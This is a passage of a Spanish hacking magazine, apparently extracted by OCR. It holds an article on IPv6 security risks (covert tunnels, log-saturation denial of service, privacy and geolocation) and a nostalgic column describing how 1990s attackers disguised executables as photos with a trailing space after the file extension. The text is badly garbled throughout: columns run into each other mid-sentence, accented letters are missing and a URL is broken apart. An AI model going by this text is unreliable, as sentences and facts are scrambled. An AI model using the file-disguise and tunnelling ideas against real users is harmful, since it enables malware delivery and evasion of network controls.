sobre IPv6. de ellas, dependiendo de la forma en

36 www.hackingmexico.mx
riesgos de seguridad en IPV6
que la autonfiguracin y parmetros Esto puede permitir se establezcan for- en gran medida riesgos severos como el
de DHCP que tenga predeterminados mas de comunicacin desde dentro de o caso de IPsec.
de fbrica su equipo de red, se pueden hacia sitios restringidos externos a la red Sin embargo, hay que recalcar que IPv6
tomar algunas deducciones para encon- encapsulando protocolos entre paquetes en s no es un protocolo orientado a la se-
trar otros equipos de red en un segmen- IPv6 o usando tuneles de salida remotos guridad, de manera que su implementa-
to perteneciente a un usuario. aprovechando la omisin de controlar lo cin de ninguna manera elimina riesgos
que entra y sale usando protocolo IPv6 por lo que hay que entender y aplicar
o algn protocolo de tuneleo como 6en4, todas las nuevas caractersticas que in-
Tuneleo y 6a4, teredo, etc. corpora para ayudar a mejorar el nivel de
canales seguridad de una red.

furtivos Tecnologa Esta necesidad de conocer y aplicar las


nuevas funcionalidades tcnicas afectan
y servicios a los servicios de red y sistemas a todos
El protocolo IPv6 integra de forma na-
tiva la facilidad para establecer canales
inpreparados los niveles, desde la arquitectura y fun-
ciones importantes de las redes de comu-
y tuneles encubiertos de comunicacin nicaciones, la configuracin de servicios
buscando seguridad y privacidad de las en clientes y servidores, y en particular
comunicaciones, as como tambin con- a los sistemas que se desarrollan ya que
IPv6 corrige algunos errores de dise-
tar con funciones de tunneling destinadas si bien pudieran funcionar de forma com-
o de IPv4 que se traducian en vulne-
a ayudar a organizaciones a dar conecti- patible con IPv6 gracias al modelo de ca-
rabilidades de seguridad muy dficiles
vidad IPv6 durante su periodo de transi- pas, es posible que se introduzcan nuevos
de enfrentar, para lo cual a lo largo del
cin. As tambin existen servicios pbli- bugs y vulnerabilidades slo por el hecho
tiempo se desarrollaron estrategias y
cos gratuitos para ofrecer a un usuario la de convivir en un ambiente con ambos
tecnologas que eran opcionales imple-
posibilidad de dar salida a un tunel IPv6 protocolos habilitados y por depender de
mentar, pero que al hacerlo se reducian
desde su terminal. mecanismos de proteccin externos ba-

www.hackingmexico.mx 37
riesgos de seguridad en IPV6

sados exclusivamente en lo que se puede para dispositivos de red o sistemas que funcionalidad tcnica y polticas admi-
lograr con IPv4. levantan registros de las direcciones IPs nistrativas crean un escenario donde cada
En pocas palabras, el diseo de la arquitec- ya que al existir tantas, si por coinciden- direccin IP pudiera llegar a quedar atada
tura de seguridad de un sistema tiene que cia o maliciosamente se ingresan en una a una persona en particular:
contemplar que eventualmente funcionar red paquetes IP que lleven al limite las
tambin sobre redes y servidores con so- bitcoras y memorias internas de los dis- Las funcionalidades comunes de DHCP
porte IPv6 y las pruebas de calidad y segu- positivos que no seran capaces de alma- que logran en muchos casos asignar
cenar tanta cantidad de registros. siempre una misma direccin al mismo
dispositivo.
Saturacin De hecho este tipo de vulnerabilidad ha
de recursos sido de las primeras que han sido docu-
mentadas y se comienza a descubrir se
Uno de los modos de autoconfiguracin por
default en muchos routers donde se toma la
encuentra presente en muchos productos direccin MAC del dispositivo para con-
ridad del sistema deben de incluir casos de
comerciales y sistemas de redes con IPv6 formar la direccin IPv6 que se le asignar.
prueba contemplando el mismo escenario.
listo. [] http://www.networkworld.com/ Si se omite habilitar el modo de privacidad
Debido a que el protocolo IPv6 contem-
para la autoconfiguracin y ofuscacin de
pla 128 bits para designar el direcciona-
miento, se espera que a cada usuario y red Geolocalizacin la direccin IP usada por el dispositivo.
local se le delegen una enorme cantidad
de direcciones IP para su uso a discrecin
y personalizacin Las polticas de cada NIC regional don-
del administrador del segmento. de direcciones de se asignan bloques de direcciones IP
en base a una localizacin geogrfica por
pas, carrier, ISP, estado, regin o ciudad.
Estas increibles cantidades de direccio- news/2011/050311-microsoft-juniper-
Es esperado en algn momento que cada
nes que se ponen sobre la mesa a partir ipv6.html
usuario y dispositivo llegue a tener una
de este momento, puede llegar a generar Si bien la cantidad de direcciones IP dis-
direccin IPv6 fija de forma permanente,
una situacin de negacin de servicio ponible es inmensa, una combinacin de
de manera que tiene que considerarse las

38 www.hackingmexico.mx
riesgos de seguridad en IPV6
Tecnologa cubrimiento de vulnerabilidades en el Siendo una tecnologa relativamente nue-

naciente y
diseo del nuevo protocolo as como de va, se debe de tener preparacin adecuada
las implementaciones de este en todos los para su aplicacin prctica y resolucin de
productos comerciales que se usen. incidentes, siendo para muchos un rea de
vulnerabilidades Una parte considerable de riesgos de expertise que tienen que desarrollar con
por descubrir urgencia debido a que antes de que se den
cuenta ya estarn viendose en la necesidad
Con de implementar servicios pblicos de red

clu
implicaciones en cuanto a privacidad y
por medio de este protocolo.
registrabilidad.

Como en todo producto tecnolgico de sio


creacin reciente, apenas est por iniciar
su etapa de evaluacin a gran escala por
nes
parte de los usuarios y entusiastas que la
seguridad asociados a IPv6 proviene de
hackean hasta llevarla a sus lmites, de
desinteresarse de su ya presencia actual
manera que se tienen que tener durante
y no ver reflejada su consideracin en los
un largo tiempo la expectativa del des-
planes y polticas de seguridad.

www.hackingmexico.mx 39
old school

Old A School
qui recordaremos
con nostalgia los
viejos tiempos,
las tcnicas
usadas, y eventos
importantes que ocurrieron en el
mundo del hack.
En esta ocasin hablaremos de
Cyruxnet, un portal informatico
que existio en los aos 90s
donde se publicaron por primera
vez tcnicas exclusivas, tales
como ocultamiento de .exes en
mensajes de Outlook express, lo
cual consista en agregar el valor
Cyruxnet, ASCII del espacio en blanco al
un portal nombre del archivo despus de la
informatico que extensin para hacerlo pasar por
existio en los un archivo inofensivo.
aos 90s donde Algo asi de sencillo, lograba
se publicaron que cuando vieras el archivo
por primera adjunto en tu correo, pensaras que
vez tcnicas se trataba de una foto, pero en
exclusivas, realidad era un ejecutable.
tales como Tambin fue de los primeros
ocultamiento de sitios en publicar cdigos de
.exes esteganografa para ocultar cdigo
malicioso dentro de fotos u otros
archivos. Un gran recurso de bugs
y exploits de la poca, cuando la
informacin de este tipo era un
poco mas difcil de conseguir.

40 www.hackingmexico.mx
seccion o articulo

www.hackingmexico.mx 41
seccion o articulo

42 www.hackingmexico.mx
I N T E G R AT E C O N N O S O T R O S
UNETE A NUESTRO EQUIPO DE COLABORADORES

informes 55 10 68 88 09
info@hackingmexico.mx
#01

Hackintosh: jailbreak IOS


Hacking Microsft C#
NAVEGACIN ANONIMA
Vulnerabilidad de Mikrotik Http Proxy
Facebook: Explotando al ser humano
El manifiesto Hacker
A quin le es llamado un Hacker